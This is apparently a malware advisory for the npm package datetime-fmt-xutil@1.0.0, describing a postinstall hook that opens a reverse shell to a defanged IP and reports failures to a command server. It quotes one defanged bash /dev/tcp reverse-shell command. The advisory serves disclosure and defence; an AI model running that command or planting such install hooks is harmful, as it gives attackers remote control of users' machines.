LWA-2026-11175 MAL-2026-13935 ↗ confirmed malware

datetime-fmt-xutil@1.0.0

Malicious code in datetime-fmt-xutil (npm)

T1059.007 · JavaScriptT1059 · Command and Scripting InterpreterT1105 · Ingress Tool TransferT1071.001 · Web Protocols

Analysis

The postinstall hook (postinstall.js) opens a reverse shell to 8[.]135[.]48[.]40:4444 at install time, trying three methods in order: a Node net socket piping /bin/sh, bash -i >& /dev/tcp/8[.]135[.]48[.]40/4444, and a python3 pty spawn. On failure it HTTP GETs hxxp://8[.]135[.]48[.]40/shell/failed?err=[.][.]. to report back to the C2. The main index.js is a decoy date-formatting function.

analyzed by
Leitwacht
first seen
Aug 13, 2026, 01:43 PM
analyzed
Aug 13, 2026, 01:43 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.